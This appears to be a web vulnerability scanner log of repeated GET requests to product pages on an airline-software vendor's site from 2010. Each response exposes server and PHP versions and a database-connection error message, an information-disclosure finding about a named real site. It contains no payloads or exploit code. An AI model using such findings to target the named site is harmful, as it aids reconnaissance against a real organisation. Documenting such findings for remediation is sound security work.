GET /home/products_services/product/electronic_ticketing_for_third-party_ground_handling HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322840; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_manager%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airport_data_intelligence%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:29:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/frequent_flyer_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322833; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:30:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/gds_electronic_ticketing HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322843; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:30:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/interact_interface HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322857; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:30:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/interline_electronic_ticketing_hub HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322858; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:30:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_gate_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322646; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_gate_planner HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322647; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fagency_management%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_load_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322650; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_movement_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322675; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_recovery_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322681; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_roster_maker HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322681; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3Bi%3A2%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A72%3A%22%2Fproducts_services%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_css%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_staff_admin HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322679; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_staff_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322691; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_aircentre_staff_planner HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322691; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airport_data_intelligence HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322704; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_cargo_revenue_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322708; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fagency_management%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
GET /home/products_services/product/sabre_airvision_codeshare_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322706; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
